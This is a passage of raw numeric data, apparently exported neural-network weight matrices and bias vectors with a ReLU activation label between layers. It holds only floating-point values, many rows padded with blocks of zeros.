-1.35, 0.0649, -0.0595, -0.3857, 0.2352, 0.02303, 0.1373, 0.7095, 0.03702], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09875, -0.3013, -1.249, -0.00528, 1.113, 0.4102, -0.7324, 0.77, 0.5654, 0.9077, -0.52, 0.0785, 1.772, -0.0931, -0.4348, -0.2712, 0.843, 0.3784, -0.185, 0.94, -0.3684, 0.4287, -0.94, 0.5645, -0.3545, 0.2458, 0.05997, 0.5234, 0.00783, 0.9233, -1.006, 1.033, 0.2876, -0.2255, -0.745, 0.5103, -0.7114, -0.9663, -0.3267, 1.373, 0.1667, 1.677, -0.10596, 0.743, 0.5493, 0.1317, -0.01852, -0.585, -0.01625, 0.07007], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1118, -0.3843, -0.0159, 0.4937, 0.48, -0.4868, -0.2396, 0.3708, -0.947, -0.26, -0.5547, -0.2426, 0.11707, -0.2656, -0.02254, 0.0794, -0.6514, 0.1087, 0.365, -1.1, 0.3735, -0.6655, -0.4983, 1.809, 0.004787, 0.0234, 0.02655, 0.01172, 0.000638, 0.22, -0.1545, 0.5894, -0.1301, -0.0492, -0.6304, 0.235, 0.641, 0.1846, 1.393, -0.8564, -0.2842, -0.784, 1.235, -0.2532, 0.1095, 1.343, 0.01917, -0.316, 0.31, 0.893], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3618, -0.1559, 0.3574, 0.0539, 0.3572, -0.3337, 0.1912, 0.989, 0.01208, 0.9756, 0.1698, 0.4756, 0.4705, 0.2122, 0.4666, 0.3564, 0.1462, -1.471, -1.281, 0.867, 1.139, 1.157, -0.2324, -0.10583, -0.64, 0.3599, 0.6265, -0.7217, -0.02307, -0.2505, 0.3003, -0.528, 0.0928, 0.743, 0.1178, 0.3665, -0.000263, -0.959, -0.07684, 0.1353, -1.224, 0.5522, 0.3774, -0.4185, -0.3713, 0.1848, 0.0276, 0.2217, -0.2424, -0.429], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5146, 0.7295, 0.5664, -0.06836, 0.5347, 0.004074, -0.2347, -0.5317, 0.3174, -0.6475, 0.466, -0.451, 1.54, 0.511, -0.2155, 0.1105, -0.0405, 0.569, -0.492, -0.544, -0.0384, -1.121, -0.6455, 1.601, -0.412, 0.4153, -0.2101, 0.4639, 0.01519, 0.2666, 0.3645, 0.2284, -0.3508, -0.3071, -0.437, 0.5596, -0.2327, -1.061, 0.1868, 0.5454, -0.4976, -0.865, 1.512, -0.207, -0.11096, 0.3865, -0.0383, 0.5195, 0.2964, 0.3135], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05164, 0.2708, 0.3374, -0.311, -0.3335, 0.2401, -1.192, -0.1437, 0.4226, 0.5654, -0.2878, -1.023, -0.5127, 0.552, -0.8315, -0.3633, 1.698, 2.127, -1.403, -0.8374, -0.0299, -2.168, 0.552, 0.6724, 0.3047, 0.5728, 0.2651, 0.2003, 0.005726, 0.847, 0.7773, 1.046, 0.12396, 0.488, 0.378, -0.714, 0.1917, 1.394, 0.5684, -0.4612, 0.7886, -0.3237, -1.339, 0.113, -1.551, 0.5576, 0.02036, 0.06213, 0.513, 1.087], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.525, -0.0544, -1.017, -0.584, -1.055, 0.4988, -0.302, -0.2737, -0.01248, 1.802, -0.1492, -0.5796, 0.0612, -0.5234, -0.8125, 0.05762, 0.04675, -0.00181, -0.284, 0.2212, 1.294, 0.4768, -0.1099, -0.02304, 0.008316, -0.5366, -0.694, 0.6177, 0.037, 0.05145, -2.318, 0.421, 0.5923, 0.596, -0.033, -0.1787, 0.267, -0.8706, -0.04016, 0.09784, -0.84, -0.1273, -0.00748, 0.1499, 0.5503, 0.004307, 0.03665, 0.0806, -0.515, 0.02437], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0444, -0.4668, -0.3203, 0.683, -0.1166, 0.0969, 0.1893, -0.423, 0.168, 0.2012, 0.0788, -0.02701, 1.4795, 0.1768, 0.7686, -0.1038, 0.4824, 0.4558, -0.483, 0.51, 0.498, 1.633, 0.1247, 2.076, 0.02094, 0.3926, -0.4155, -0.2815, 0.03745, -0.3074, 1.118, 1.164, -4.508, 0.08417, 0.1631, -0.1957, -0.1311, 0.525, -0.11127, -0.1218, 0.0648, 0.2372, 1.985, -0.07245, -0.2925, 0.627, 0.01845, -0.0786, -0.1891, 0.0744], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.837, -0.4517, -0.2272, -1.892, 0.6973, 0.597, -0.9126, -3.637, 0.2964, 1.27, 0.013336, -0.3174, -0.2563, 0.6396, 0.7563, 0.2852, 0.486, -1.42, 0.0483, 0.7256, 2.18, -1.342, 0.545, 0.3118, -0.922, 0.3237, 1.84, 0.3137, -0.02731, -0.1791, 2.57, 0.3174, 0.4307, 0.3635, 0.02158, -0.1465, -0.908, -0.799, -0.1092, -0.4885, -0.874, 0.8857, -0.1005, 0.2656, -0.9917, -0.1153, -0.002779, 0.887, 0.2081, 0.1606], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9873, -0.1188, 0.1121, 0.01542, -0.3738, 0.0571, -0.519, 0.7275, 0.9443, 0.2438, -0.8525, 0.2988, 0.0541, 0.7534, 0.00644, 0.01516, -0.126, 0.02715, 1.59, 0.00545, -0.0424, -5.52, 0.2827, -0.3362, 0.1686, -0.04956, 1.108, -2.96, -0.0114, -0.2815, 0.03026, -0.02835, 1.144, 0.2542, 0.0917, -0.0177, -0.928, 0.2708, 0.1523, -0.02423, -0.297, -0.906, 0.2654, -0.717, -0.8823, 0.198, -0.049, 0.12463, -0.2427, 0.198], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2208, -1.904, -0.11707, -1.613, -1.1, 0.25, 0.5244, -0.279, 0.928, 0.9307, 0.12305, -0.1427, 0.2532, 1.896, -0.01617, -0.216, -0.1653, 0.0416, -0.5938, 0.528, 0.3276, -0.2874, 0.3489, 1.712, 0.423, 0.658, 0.1021, 0.03082, -0.01488, -0.1467, 2.035, -0.2166, 0.00872, -0.07623, 0.2206, 0.512, 0.0954, 1.49, -0.3901, 0.519, 0.2844, -0.6113, -1.385, 0.2311, -2.504, 1.033, -0.003036, 0.2333, 0.1934, 0.2092], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02205, 0.05536, -0.05484, 2.545, -0.566, 0.1685, 0.7256, 0.4417, -0.2375, 0.4775, -0.212, 0.02953, -0.1876, -0.1186, 2.725, -0.145, -0.2328, -0.1913, 1.357, -0.4949, -0.464, -1.606, -0.03406, 0.1593, -0.1332, 0.03326, 0.6694, -1.361, -0.04895, -0.2607, 0.4248, 1.51, 2.25, -0.2556, 0.507, 0.4346, -0.7363, 1.049, 0.266, 0.003632, 0.02629, 0.678, -0.2083, -0.227, -0.1895, -0.001458, -0.02191, 1.231, -0.08014, -0.07623], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.678, 1.14, -0.2288, 0.5557, -0.572, 0.8936, 0.815, 0.1694, -0.2098, -0.3772, 0.2048, 0.1536, -0.421, 0.3884, 0.2329, -0.3552, 0.4885, 0.05405, 0.303, 0.927, 0.2903, 0.623, 0.554, -0.11456, -0.6904, -0.1205, 0.676, 0.4656, -0.002857, -0.05475, 1.559, -1.943, 0.1848, -0.4624, -0.2642, -0.1862, -0.2115, 0.1338, -0.198, -0.2854, -0.4355, -0.56, -0.06836, 0.2179, 1.24, -0.4805, 0.00834, 0.2625, 0.05118, -0.394], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3027, -0.619, 0.2386, -0.8105, -0.339, -0.2993, 0.6245, 0.2463, -0.794, 0.3223, 0.2084, 0.1656, 0.7817, -0.01764, 0.1711, -0.1963, -0.3447, -0.966, -0.4102, -1.379, -0.1976, 1.354, 0.05176, 2.39, 0.1451, 0.005306, -0.01021, -0.575, -0.0246, 0.552, -3.191, 0.3708, -0.527, -0.1332, 0.5474, -0.005318, -0.6377, 0.01469, -0.004456, 1.148, 0.493, 0.261, 0.677, -0.02544, -0.663, 1.263, 0.0002342, 0.08246, -0.1826, 1.222], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3535, 0.06696, 0.04938, 1.115, -0.1174, 0.01294, -0.5957, 1.251, 0.0401, 1.054, -0.1326, 0.1432, -0.2654, -0.5557, 1.349, 1.304, 0.335, 1.882, -1.96, -1.125, -2.22, 0.704, 0.2607, 0.1775, 0.4775, -0.06192, -1.012, -0.10345, 0.02687, 0.3127, -3.852, -0.3328, -0.738, 0.6836, -0.1511, -0.358, 0.9043, -0.565, -0.3464, -0.09705, 0.4634, -0.3245, -0.1956, -0.01214, 0.7104, -0.00606, 0.02502, 0.1515, 0.3435, -0.02577], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4197, 0.3071, -0.0684, -0.2852, 0.752, -0.297, -0.639, 0.6206, 0.241, 0.95, -0.1753, 0.3916, 0.10297, -0.715, -0.1461, 0.2041, 0.694, 0.838, -0.00613, 0.768, 0.2546, 2.334, 1.259, -0.6816, 0.7153, -0.333, 0.2499, 0.551, 0.0193, -0.3474, -1.285, 0.8296, -0.153, 0.3545, 1.263, 0.0471, -0.338, 1.591, 0.8457, 0.574, 0.3147, 0.285, -0.1682, -0.341, 0.3901, 0.3176, -0.01703, 0.292, -0.2297, 0.2805], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.604, -0.2505, 0.1768, -0.4854, 0.5186, 0.4202, 0.7646, -0.501, 0.0003655, 0.2866, -0.1996, -0.0688, -0.0904, 0.10034, 1.873, -0.5503, -0.2378, -0.04517, 0.0369, -1.014, -1.191, -0.3647, -0.0852, 0.178, 0.1915, -0.6904, -0.1082, -1.068, 0.04382, 0.05374, 0.298, 1.281, -3.408, -0.01396, 0.774, 0.09064, 1.231, 0.3105, -0.4216, -0.3645, 0.1647, 0.96, 0.1676, -0.3157, 0.03152, -0.075, 0.04245, -0.02615, 0.1312, 0.1909], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.631, -0.137, 0.1929, 1.833, -1.314, 0.3633, -0.703, 0.1945, 0.0867, -0.3916, 0.2443, -0.1306, 1.042, 0.0716, 0.04477, -0.01127, -0.06137, 0.01642, -0.2837, 0.559, -1.023, 1.701, -0.52, -0.3572, 0.2317, 0.4136, 0.8315, -0.6523, 0.01236, 1.014, -0.09216, 1.859, -0.275, 0.003967, 0.499, -0.05838, -0.542, -0.509, 1.442, -0.1499, 0.0668, 0.2289, -0.189, -0.1451, 0.7134, -0.2306, 0.02992, -0.4338, 0.1184, 1.129], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.484, -0.693, 0.3877, -1.921, 1.291, -0.1266, -1.125, -0.8306, 0.9536, 0.4604, 0.352, -0.09503, -0.07434, -0.512, -0.718, 0.3647, 0.589, 1.08, -0.3235, -0.9697, -0.3345, -1.965, -1.154, 0.939, 0.641, -0.4294, -0.5176, -0.2129, 0.01942, 0.8003, -0.04337, 0.754, 0.1137, -0.195, 0.2693, 0.6475, 0.8486, 0.02275, -1.174, 0.8354, -0.5415, -0.01152, -1.272, -0.0991, -0.7124, 0.3096, 0.03644, 0.3535, 0.5103, -0.06647], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1626, 0.0806, 0.1099, -2.16, 1.559, -0.221, 0.5493, -1.262, 0.325, 1.043, 0.02269, 0.02127, 0.5356, 0.9487, -0.2915, -0.887, 0.587, 0.9937, 0.314, -0.728, -0.01531, -0.06305, 0.2705, -0.5327, 1.483, 0.4817, -1.033, 0.585, -0.01924, -0.0841, 0.94, 0.929, 0.03543, 0.713, 0.8657, -0.4568, 0.1107, -0.7544, 0.03004, -0.2551, 0.7583, 0.073, -0.8003, 0.4766, 0.2854, 0.1829, -0.01607, 0.629, 0.0888, 0.4172], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01382, -2.838, 0.1154, 1.488, 0.315, -0.2935, 0.339, 0.8354, -0.7305, 0.3196, 0.1785, 0.2517, -0.865, -0.5366, -0.000729, 0.2264, -1.246, 0.678, 0.445, 0.2023, 0.3071, 1.541, 0.01749, 0.0373, -1.042, 0.2092, -0.555, 0.00669, -0.01894, 0.3765, 1.137, 0.675, -0.6484, -0.1545, 0.633, 0.3853, -0.0822, 1.066, -0.3752, 0.5757, 0.1757, -0.8047, 0.964, 0.5356, 0.1648, -1.08, -0.02248, 0.1965, 0.0715, -0.6235], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.928, -0.00596, 0.3364, -0.1692, -0.986, 0.1415, -0.781, -0.2377, 0.10693, -0.579, 0.099, -0.618, 0.07495, 0.8022, 1.215, 1.04, -0.2355, -1.392, -0.4958, 0.51, -0.995, -1.666, -0.3606, 0.03525, 1.348, -0.10394, 0.00431, -1.479, -0.03326, -0.1875, 1.259, 0.623, -0.4355, 0.7627, -0.0678, 0.4458, -0.2374, -0.673, -0.1741, -0.305, 1.561, 0.2341, -0.3318, 0.2491, -0.4963, -0.0882, -0.0321, 1.452, -2.316, -0.07935], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6343, -0.412, -3.855, 0.8833, 0.05988, -0.6724, -0.983, -0.04044, 0.359, 2.043, -0.691, -0.3076, 0.3096, -0.10126, -0.7227, 0.407, 0.1816, 1.643, 0.1073, -0.139, -0.915, -0.9067, -0.58, 0.3416, -0.2029, -0.586, -0.1371, 0.3933, -0.04364, -0.321, -0.739, 0.3833, -0.8296, -0.3938, -0.496, 0.688, -0.1299, 0.1477, -0.10016, -2.443, 0.653, 0.601, -0.05347, -0.678, -1.019, 0.006668, 0.0092, 0.7163, 0.62, -0.4175], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2245, -0.232, -0.8936, 1.19, 0.01415, -0.7627, 0.9043, -0.6655, -0.4185, 1.469, -0.8364, 0.2822, 0.9194, 0.4565, 0.4546, 0.4136, -0.9976, -0.5225, 0.6543, 0.0382, -0.3145, 0.1709, 0.091, -0.519, 0.811, -0.78, 0.5044, -0.2576, -0.03183, 0.1205, 0.94, 0.1786, -0.1956, 0.7935, -0.7617, -0.15, -0.02278, 1.351, 0.0408, -0.289, 0.577, -0.6353, -0.06964, -1.54, -0.9272, -0.314, -0.007053, -0.07916, 0.648, 0.544], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.164, -0.05658, -0.2954, 1.029, 0.3372, 0.2017, -0.589, 0.1233, 0.2247, -0.2798, 0.357, 0.1326, 1.438, -0.372, -0.8027, -0.04108, -0.02632, 1.264, -0.502, 0.3735, -0.2073, 1.873, -0.05432, 2.516, -0.0881, 0.2264, -0.159, 1.079, -0.013466, 0.1874, -0.2666, 1.763, -0.4126, -0.0733, -0.1647, -0.0461, 0.3567, 0.1449, -0.1805, -0.04514, 0.2554, 0.0998, 1.042, -0.2656, 0.03198, 2.402, 0.02142, -0.042, 0.05655, 1.07]]
[-0.838822, -0.444064, 0.748647, -0.26248, 0.754242, 0.713487, 0.490337, 0.792159, 0.888753, 0.459342, -0.175118, 0.949957, -0.928814, -0.473677, 0.439304, -0.00998504, -0.349078, 0.528565, 0.412139, 0.688213, 0.958401, -0.33694, -0.391604, -0.00917568, -0.0195476, -0.348621, -0.453349, -0.76955, -0.593454, -0.32294, -0.920786, 0.288749, -0.952069, -0.104851, -1.17227, -1.09622, -1.4131, 0.20675, -0.297869, -1.11681, -0.894663, 0.158122, -0.618077, -0.404634, -1.21882, -0.600746, -1.07492, -0.667219, -0.536134, -0.452719, -0.839, -0.444, 0.7485, -0.2625, 0.7544, 0.7134, 0.4902, 0.792, 0.8887, 0.4592, -0.1752, 0.95, -0.9287, -0.4736, 0.4392, -0.00999, -0.349, 0.529, 0.412, 0.688, 0.9585, -0.337, -0.3916, -0.00918, -0.01955, -0.3486, -0.4534, -0.7695, -0.5933, -0.323, -0.921, 0.2888, -0.952, -0.10486, -1.172, -1.097, -1.413, 0.2068, -0.2979, -1.117, -0.8945, 0.1581, -0.618, -0.4045, -1.219, -0.6006, -1.075, -0.667, -0.536, -0.4526]
ReLU
[[0.29329, -0.218654, -0.549183, 0.22792, -0.114775, 0.113745, -0.070574, 0.0224154, 0.762545, 0.0477132, -0.127271, 0.000213102, -0.342519, 0.0566823, 0.0840251, -0.000594736, 0.0995126, 0.109976, 0.213004, 0.0833588, -0.265225, -0.191404, 0.157173, -0.0320786, 0.00409382, -0.182032, 0.326567, -0.357178, 0.640777, 0.215446, -0.196507, 0.122053, 0.206608, 0.497091, -0.131647, 0.00659788, -0.343404, -0.118135, -0.0213549, -0.395837, 0.037264, 0.308757, 0.0341949, -0.144027, -0.302195, -0.139866, 0.0270174, 0.251558, -0.359226, 0.470901, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.24949, 1.08846, 0.367508, -0.253265, 0.156709, 0.368132, -0.335936, -0.165754, 0.15152, -0.121147, 0.780214, -0.28483, -1.30203, 0.389581, 0.109342, -0.0411583, 0.330815, 1.05821, -0.424809, -0.1078, -0.490332, 0.832573, 0.280489, -0.0111262, -0.0437485, 0.303693, 0.24413, 0.498489, 0.148951, 0.444397, -0.109783, 0.627072, 1.04431, 0.22518, -3.00848, 0.334879, -0.261703, -0.581005, -0.838798, -0.0375312, 0.0430156, -0.0293076, 0.41049, -0.669078, -0.28665, -0.50927, 0.816973, 0.604573, -0.0510528, 0.485696, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.516689, 0.188573, 0.1539, 0.0683803, -0.0218735, 0.37739, -0.321765, -0.623313, 0.0879568, -0.294029, 0.0859447, -0.0386633, -0.201001, -0.442731, 0.990714, -0.0429968, -0.168209, -0.399614, -0.0590701, 0.211837, -0.0147021, -0.458955, -0.252123, -0.0306582, 0.0172476, 0.15906, 0.329446, 0.498418, -0.262215, 0.249915, 0.276292, -0.420737, -0.430038, 0.142035, 0.0571227, -0.232666, -0.165299, 0.0358767, 0.263602, 0.125926, 0.294122, 0.0636838, -0.0239535, -0.185323, 0.450232, 0.148458, -0.600504, -0.72835, 0.0983809, -0.0776871, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 